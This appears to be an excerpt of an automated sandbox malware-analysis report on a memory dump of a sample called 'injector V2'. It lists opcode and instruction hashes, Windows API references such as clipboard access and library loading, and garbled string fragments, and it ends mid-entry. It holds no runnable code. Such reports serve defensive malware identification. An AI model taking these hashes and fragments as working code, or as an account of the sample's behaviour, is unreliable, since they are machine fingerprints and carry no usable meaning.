                                                                                    • Opcode ID: 806dbd789992583e3f5a9b353890eb80d6b43256d07365f12c610fe55a1a2e57
                                                                                    • Instruction ID: 2e8427c41f75f6d02aabc341fab3161eb983de88cc61e617143108e86bb1691a
                                                                                    • Opcode Fuzzy Hash: 806dbd789992583e3f5a9b353890eb80d6b43256d07365f12c610fe55a1a2e57
                                                                                    • Instruction Fuzzy Hash: 1BD092783D83417BE1B48708AC17F1032606302B51F340664B326EE2E1CAE0A112861C
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                    • String ID: !$Y$d$e$f$g$i$k$n$x$y$~
                                                                                    • API String ID: 2832541153-1356265168
                                                                                    • Opcode ID: cb58a34ceb3d3e6a40f86cc673dfcda2e0a7c772b173306605a6592191c1e6ba
                                                                                    • Instruction ID: d3de8f92f8bbaa2aa1843ec74c75cfa727954b9f3f8777890a54f0e2c763787f
                                                                                    • Opcode Fuzzy Hash: cb58a34ceb3d3e6a40f86cc673dfcda2e0a7c772b173306605a6592191c1e6ba
                                                                                    • Instruction Fuzzy Hash: 5151AFB160C7818FD304AF78D48A36FBED19BD6318F09493EE4C586382D6BD95888767
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !8 '$)?6~$,89'$..$:S$DvEU$Je;/$O:<;$O:<;$SP$bk6$f$f\@W$rm$
                                                                                    • API String ID: 0-1785535613
                                                                                    • Opcode ID: 220c2e07d34b337964d7618d02432982ac70bec5f273066a8562a0f43d111e6d
                                                                                    • Instruction ID: a12fd25bc03451607a5b161647c784aa9c11193ed6b1098f86614541a924438f
                                                                                    • Opcode Fuzzy Hash: 220c2e07d34b337964d7618d02432982ac70bec5f273066a8562a0f43d111e6d
                                                                                    • Instruction Fuzzy Hash: 85C124725083918BD321CF29849076BFBE1AFD2310F1946ADE4D55B382D7398D0ACB96
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(335E3151,00000000,00000800), ref: 0042F7B6
                                                                                    • LoadLibraryExW.KERNEL32(335E3151,00000000,00000800), ref: 0042FA46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID: 8M:O$B=_?$H9S;$Q1^3$vA.C$wEtG
                                                                                    • API String ID: 1029625771-732900325
                                                                                    • Opcode ID: df12a9a3b11411e9bca1ba1a83d448eae64270d37feb6e3b2f3458e7730127e2
                                                                                    • Instruction ID: b41059fe6161e1773b629013443bc6d481a0074fac93752a1bd1c4d58c6af018
                                                                                    • Opcode Fuzzy Hash: df12a9a3b11411e9bca1ba1a83d448eae64270d37feb6e3b2f3458e7730127e2
                                                                                    • Instruction Fuzzy Hash: 25D11971245B908BE7268F35C4607E3BFE1AF56304F5848ADC4EA9B342D77EA409CB54
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 3c?a$7R$9s:q$;w9u$;w9u$<o0m$MJKH$P$Sg/e$[Y$_]
                                                                                    • API String ID: 0-2646023433
                                                                                    • Opcode ID: 555a22c5120b3270df6d0f69afafc9e1b5306c30481c4fe12e379be4c0b9ab04
                                                                                    • Instruction ID: e9620c69a6103c5ba334a126868c74336939e5a7c137a31b35142e4d59233b3d
                                                                                    • Opcode Fuzzy Hash: 555a22c5120b3270df6d0f69afafc9e1b5306c30481c4fe12e379be4c0b9ab04
                                                                                    • Instruction Fuzzy Hash: 65E1E2B8A01224CFDB14CF65E8C17AE7B71FF49304F6440ADE905AB366DB759802CB99
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MJKH$MJKH$OtLw$cL\R$l\CV
                                                                                    • API String ID: 0-4086322766
                                                                                    • Opcode ID: dee320c6a975592afd9aa92b3fda8d9ed7069028afe873cd7105f2598da78ae5
                                                                                    • Instruction ID: b8d79928466b81fa6e665cbc02488275f61c78a6c632bf3d7cfecef4fd16db41
                                                                                    • Opcode Fuzzy Hash: dee320c6a975592afd9aa92b3fda8d9ed7069028afe873cd7105f2598da78ae5
                                                                                    • Instruction Fuzzy Hash: D2E120B4E00268CBEF209FA5E8917AEBBB1FF46314F24456DD514AB381E7384941CF94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: MJKH$MJKH$OtLw$cL\R$l\CV
                                                                                    • API String ID: 0-4086322766
                                                                                    • Opcode ID: dcd2ba07b43bf613fdc276db8dc7784f7307c4723c6fed4f9b82d9feb7456dfd
                                                                                    • Instruction ID: 9dd9f7735b15a068869410b895f305196ac924b8c67d20fc243daf02dcd64c4e
                                                                                    • Opcode Fuzzy Hash: dcd2ba07b43bf613fdc276db8dc7784f7307c4723c6fed4f9b82d9feb7456dfd
                                                                                    • Instruction Fuzzy Hash: C8E140B4E00268CBEF209FA5E8913AEBBB1FF46314F2445ADD514AB381D7384946CF94
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: 4$7654$7654$7654$K7$`b]}
                                                                                    • API String ID: 2994545307-838136105
                                                                                    • Opcode ID: 7a62161f380c079c7f23add8dcc83c5fbe0d84753278145194db94ece7c9b589
                                                                                    • Instruction ID: 50b6da44d93c1792856bc455184b70f21b6a54fb13ff090464422bab90ea71ab
                                                                                    • Opcode Fuzzy Hash: 7a62161f380c079c7f23add8dcc83c5fbe0d84753278145194db94ece7c9b589
                                                                                    • Instruction Fuzzy Hash: 4DD13974648390DBE7218F24DCD0BBB7B91FB9A318F144A6DD1C997292C3399842CB5E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: & >&$& >&$'c*/$465($QNLHU^_C$U^_C
                                                                                    • API String ID: 0-1240851877
                                                                                    • Opcode ID: ed37147442375a8d0144c7d62f39d475980038a2695cb8c74a09f36bcfd02624
                                                                                    • Instruction ID: fc6c38fce2dcb20bdca7f5051d2d8e7bc516b55391322947b2bf6a2bcf4e3e91
                                                                                    • Opcode Fuzzy Hash: ed37147442375a8d0144c7d62f39d475980038a2695cb8c74a09f36bcfd02624
                                                                                    • Instruction Fuzzy Hash: 9ED15832A086668BCB20CF68D4812BBFBF1EF15350B58462EC88597781D33CE946D7D9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 6UB$7654$7654$jk
                                                                                    • API String ID: 0-3543152547
                                                                                    • Opcode ID: 7412a323cc6b017f4f633e1f5475c913d35ed709256c0348101bad1e1c57648a
                                                                                    • Instruction ID: 8317febcb0b717ea02dc42b19145c097d7e2226fcb24f2932e02abe06aebe43e
                                                                                    • Opcode Fuzzy Hash: 7412a323cc6b017f4f633e1f5475c913d35ed709256c0348101bad1e1c57648a
                                                                                    • Instruction Fuzzy Hash: 17525439608361CFD714CF29E89062BB7E1FB8A314F498A7DE89697391DB35D801CB85
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: <$JKJI$j$pq
                                                                                    • API String ID: 0-2944771567
                                                                                    • Opcode ID: ef9883c23492cdfec89b0b4084c54923a742b4da166ce1101963caae23d8f357
                                                                                    • Instruction ID: 91f8302978429f6c97d05afd76f222b51d3979d4d5d34a8d7d2b287b969992a7
                                                                                    • Opcode Fuzzy Hash: ef9883c23492cdfec89b0b4084c54923a742b4da166ce1101963caae23d8f357
                                                                                    • Instruction Fuzzy Hash: D7C1D77110C3848BD314CF25849536FBBE1EBD2714F18896EE5E56B382C779890ACB9A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 54$DvEU$SUil$amgl
                                                                                    • API String ID: 0-685111924
                                                                                    • Opcode ID: 21d76894d5700cfb92770cb0aa2744c22bb0ab713e9a071e0b9ef0354df58a4c
                                                                                    • Instruction ID: 79af6e121721f5ffa45134ff6882e80b8ee20a3b93272787622080eb09e38dae
                                                                                    • Opcode Fuzzy Hash: 21d76894d5700cfb92770cb0aa2744c22bb0ab713e9a071e0b9ef0354df58a4c
                                                                                    • Instruction Fuzzy Hash: B461F23054D3D28AD3118F3594A075BFFE0AFA3344F184AADE4D45B392D37A8909C76A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$$$).)(
                                                                                    • API String ID: 0-361422049
                                                                                    • Opcode ID: 56527889b32f2f251d880d548777d62b8ab6d632cec1d2cb6246ff2a7ed2ecce
                                                                                    • Instruction ID: f7dc44835eb6fbbfc1f5fa80d19c4fc6901d8282c6d76e5c18f1f4804d287ff4
                                                                                    • Opcode Fuzzy Hash: 56527889b32f2f251d880d548777d62b8ab6d632cec1d2cb6246ff2a7ed2ecce
                                                                                    • Instruction Fuzzy Hash: CB02ADB55093828BD3348F25C8997EBBBE1EF91314F19892DD4C98B392EB784445CB86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: 7654$HI$gfff
                                                                                    • API String ID: 2994545307-1303360943
                                                                                    • Opcode ID: 604f32ed076cc958f383721a911946474ed089ff3aade1725ecc375025b14076
                                                                                    • Instruction ID: af2d492fe1dedfc1f18e5172eaac6f7be7c7678aad385e989c90aa042a67c8ec
                                                                                    • Opcode Fuzzy Hash: 604f32ed076cc958f383721a911946474ed089ff3aade1725ecc375025b14076
                                                                                    • Instruction Fuzzy Hash: CB5123716142414BE3188B39DC517ABB7DAFBC6314F58863EE546CB3D1EB78C8428785
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @N$v?>1
                                                                                    • API String ID: 0-1980814489
                                                                                    • Opcode ID: 53a6c00c346269786558f198c2917e6592e25cf714322032e310186953531244
                                                                                    • Instruction ID: b815ac515d5149a352201064e4ceb10a2ef09a794e6e19aa38af7178c6c82b42
                                                                                    • Opcode Fuzzy Hash: 53a6c00c346269786558f198c2917e6592e25cf714322032e310186953531244
                                                                                    • Instruction Fuzzy Hash: 7B41BEB04183919BC7108F25C861AABBBF1EF86368F049A5DE4D59B391E338C945CB5A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 7654$7654
                                                                                    • API String ID: 0-1888865020
                                                                                    • Opcode ID: f5887b8fd7f6c5d2d24d687c39086d884df02f68e9c031eb7daa422e603e60e7
                                                                                    • Instruction ID: d08d1943bad8525e3ca43d147dfc1494f48fe811f4815c66b09e7db94dc3b93d
                                                                                    • Opcode Fuzzy Hash: f5887b8fd7f6c5d2d24d687c39086d884df02f68e9c031eb7daa422e603e60e7
                                                                                    • Instruction Fuzzy Hash: 4D11BF742A82A08BE7698B2494D05BBA7A1BB96314F64362ED59217251C328D8438A8F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #
                                                                                    • API String ID: 0-1983530799
                                                                                    • Opcode ID: fea2b7f609e798078a47ea8125f5ba3705a828eb677d211e4f24c4966cf23b64
                                                                                    • Instruction ID: 16983268d4ac3bd1b08c4ace5a67aee5d53ffbba90d8fd287a7bb8df6a2c2f8c
                                                                                    • Opcode Fuzzy Hash: fea2b7f609e798078a47ea8125f5ba3705a828eb677d211e4f24c4966cf23b64
                                                                                    • Instruction Fuzzy Hash: 07022736658211CBD7149F38EC5236B77E2EF8A301F0A987DD5C1872A0E77AC921C75A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #
                                                                                    • API String ID: 0-1983530799
                                                                                    • Opcode ID: 2c6470fbe8bfa2e03277857ab20cfc9f72d8c939d3a53ac69ef42ccbd73aedb0
                                                                                    • Instruction ID: 17b37a8fecff2b217920f7b254b8c35aa4c1f4d6147ab754ba93e2967f30538c
                                                                                    • Opcode Fuzzy Hash: 2c6470fbe8bfa2e03277857ab20cfc9f72d8c939d3a53ac69ef42ccbd73aedb0
                                                                                    • Instruction Fuzzy Hash: 3A021636658211CBD7249F38EC5126B73E2FF9A311F0A987DD5C1872A4E77AC920C74A
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(00444598,00000000,00000001,00444588), ref: 004241F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID:
                                                                                    • API String ID: 542301482-0
                                                                                    • Opcode ID: 97ddf2392ef8df18f2afb7d3c27a62fad871183f209af3ce23b934142a76bfcb
                                                                                    • Instruction ID: 7378c28b204052c7e7ee2e60f1942579741da6e71b5d793b2542d77e0b6c9c6d
                                                                                    • Opcode Fuzzy Hash: 97ddf2392ef8df18f2afb7d3c27a62fad871183f209af3ce23b934142a76bfcb
                                                                                    • Instruction Fuzzy Hash: F951DEB07003209BDB20DB65EC86B6733B4EFC57A8F494559F9858B391E379E801C72A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: pz
                                                                                    • API String ID: 0-1340104481
                                                                                    • Opcode ID: 2eeadf915c5ad70cf9ad73630548bdbe5f84cdc73e4daeea92e4961975136536
                                                                                    • Instruction ID: f7aedc96a884d33bce34398114fe9444267788ae15f08321c1de82ffabf57873
                                                                                    • Opcode Fuzzy Hash: 2eeadf915c5ad70cf9ad73630548bdbe5f84cdc73e4daeea92e4961975136536
                                                                                    • Instruction Fuzzy Hash: 0EB113745043018BC724DF29C8916ABB7F1FF81354F18892EE8D68B3A1E779D845CB96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: "
                                                                                    • API String ID: 0-123907689
                                                                                    • Opcode ID: 0c7c25f7058e96ca7794fb020a11ecd90d2348f77ff94408ed96b73bb5e75ca2
                                                                                    • Instruction ID: 9e104787e69459f5c2f95f267e37a844ca30ff533cd81c3114270e58663d6d2c
                                                                                    • Opcode Fuzzy Hash: 0c7c25f7058e96ca7794fb020a11ecd90d2348f77ff94408ed96b73bb5e75ca2
                                                                                    • Instruction Fuzzy Hash: 41C117B2B043205BD7248E25E4D176FB7E5AF84310F99892FE49587381D738E944C7C6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $
                                                                                    • API String ID: 0-3993045852
                                                                                    • Opcode ID: 22e01f9db302b1660e28f19de86abefc405e9c7941c06982d3b11d82ddf61ef3
                                                                                    • Instruction ID: 7c8f7bd456b04a8827133ad97dd73c07524d727ed80991c4a2e54f5e9a2f2f30
                                                                                    • Opcode Fuzzy Hash: 22e01f9db302b1660e28f19de86abefc405e9c7941c06982d3b11d82ddf61ef3
                                                                                    • Instruction Fuzzy Hash: BC5102B56483818BD3348F24C8957FBB7E1EFD2304F19892DD4898B392EB785845C786
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $
                                                                                    • API String ID: 0-3993045852
                                                                                    • Opcode ID: 356a62af3435d0b03cd2d62982fa46bd9285116f465b64ace3ac3bab5886fd2e
                                                                                    • Instruction ID: cb4176cf4c905493e5212b0a1ab631082346b3ce2c359dbd360c70e3a8f4fad7
                                                                                    • Opcode Fuzzy Hash: 356a62af3435d0b03cd2d62982fa46bd9285116f465b64ace3ac3bab5886fd2e
                                                                                    • Instruction Fuzzy Hash: C951E3B52483828BD3348F24C8957FBB7E1EFC6314F19892DD4898B292EB785845C786
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: V
                                                                                    • API String ID: 0-1342839628
                                                                                    • Opcode ID: 74205551ad661516210fe3a76944825f32e112498cf0897dd8502a1a635f172f
                                                                                    • Instruction ID: 5485bd3761b63e485045982c35cd463daa20cb546944840e12c3ca4036bc9696
                                                                                    • Opcode Fuzzy Hash: 74205551ad661516210fe3a76944825f32e112498cf0897dd8502a1a635f172f
                                                                                    • Instruction Fuzzy Hash: C95106719083918BD724DF25C8617AFB7E6ABD6304F088C3ED4CAA7282DB394945875A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: MJKH
                                                                                    • API String ID: 2994545307-1589446790
                                                                                    • Opcode ID: 4780d11b98806f7cc482536b4cf84856f644680c0fcac0e82e3a3fabe91ea1f2
                                                                                    • Instruction ID: ce6050c1f6c7791fb0fba18a06f02e92d2d46cbe9c599be55e7e9f3d2f0f9d87
                                                                                    • Opcode Fuzzy Hash: 4780d11b98806f7cc482536b4cf84856f644680c0fcac0e82e3a3fabe91ea1f2
                                                                                    • Instruction Fuzzy Hash: 2331F835F50224CBEB184F56E85077F7721FB59320FA9412DC6262B691C77A5C028BDC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID: 7654
                                                                                    • API String ID: 2994545307-4024152101
                                                                                    • Opcode ID: e98f1fa3bea65b3207480e233cad6034927cf44904c492b2f9f1acdd9596f37e
                                                                                    • Instruction ID: c4104f41aabd91591706737d10641252dab86e3e7165d0dd011c765d44a29970
                                                                                    • Opcode Fuzzy Hash: e98f1fa3bea65b3207480e233cad6034927cf44904c492b2f9f1acdd9596f37e
                                                                                    • Instruction Fuzzy Hash: AE112CB46A4210DBE7194F24DCC19BA7752FB56318F64252FD24316291C3259D438BDF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f2533e274285e20ab901d8a1daddf8b004987537db9b03cd0f544795d639abf0
                                                                                    • Instruction ID: fb3a1271c1dc2fb7141023adfb49e802e0cc5a45028e2a585a9e07336740357f
                                                                                    • Opcode Fuzzy Hash: f2533e274285e20ab901d8a1daddf8b004987537db9b03cd0f544795d639abf0
                                                                                    • Instruction Fuzzy Hash: 5852E531A087118BC725DF18D98026BB3E2FFD4314F29893ED9D6A7385D738A951CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c4464a471b1101e6f0cfba2cf2749b35080e7e252119e3e9209d9fbdbcaa8a07
                                                                                    • Instruction ID: 4593b49731f7ca398684b290bfa10eec681faba80c427aecb6f8d7b195a0bca1
                                                                                    • Opcode Fuzzy Hash: c4464a471b1101e6f0cfba2cf2749b35080e7e252119e3e9209d9fbdbcaa8a07
                                                                                    • Instruction Fuzzy Hash: 84F1C0352087418FD724CF29C88176BFBE2AFD9304F08882DE5C687791E639E944CB96
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7317a98eba82fb453c5ba973ba21e2c3c7a0863b83d9ac4534c15e29104edf6
                                                                                    • Instruction ID: 1c14b848e7c9f2a2998ca82555c1ab2509ad684e0fb7e1444311c53dce40a25e
                                                                                    • Opcode Fuzzy Hash: f7317a98eba82fb453c5ba973ba21e2c3c7a0863b83d9ac4534c15e29104edf6
                                                                                    • Instruction Fuzzy Hash: F5B1F0B06083208BD3249F24C85272BB7F1FFA6355F48895DE4D58B3A4E77D9A01CB96
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8cccd2d485aed7df0d3faf96fd8aa420d34ed02227223fbf47cbdf68679cada3
                                                                                    • Instruction ID: 35b2549aa90c9f90b5b2958ce822cafdd3ddce8f62e44973523cceac975c7c38
                                                                                    • Opcode Fuzzy Hash: 8cccd2d485aed7df0d3faf96fd8aa420d34ed02227223fbf47cbdf68679cada3
                                                                                    • Instruction Fuzzy Hash: C8915675A00161CFCB008F68D8816FFBBB2AF9A304F59456ED495A7342DA3D9806CB68
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1e2e678118abe9fdde322b43f71ab0c5b0c6e5290fb7c17ae770a54029a3f637
                                                                                    • Instruction ID: 0eaa56c5db7436f8190d932b4663b9047ab687343c802e24c7619c06c9609538
                                                                                    • Opcode Fuzzy Hash: 1e2e678118abe9fdde322b43f71ab0c5b0c6e5290fb7c17ae770a54029a3f637
                                                                                    • Instruction Fuzzy Hash: 7F7134F5A003119FCB14CF29C9807AA7FB2FB85310F1986A8D854AF396D7B48906CBD5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d7f1bcbca8f73a82adf17fc8ec1e627ee7f8d428773746b2fca543abff7096b0
                                                                                    • Instruction ID: 8481db755cd8ea04d2d51c3e3e0ef64bc0051189ca126cf83d8fb17c3486ae24
                                                                                    • Opcode Fuzzy Hash: d7f1bcbca8f73a82adf17fc8ec1e627ee7f8d428773746b2fca543abff7096b0
                                                                                    • Instruction Fuzzy Hash: 3951D572B11D0247C75CCA2DDC6267BB293ABC5320B5D832EDA27D73C9DF3498128284
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2254423313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_400000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
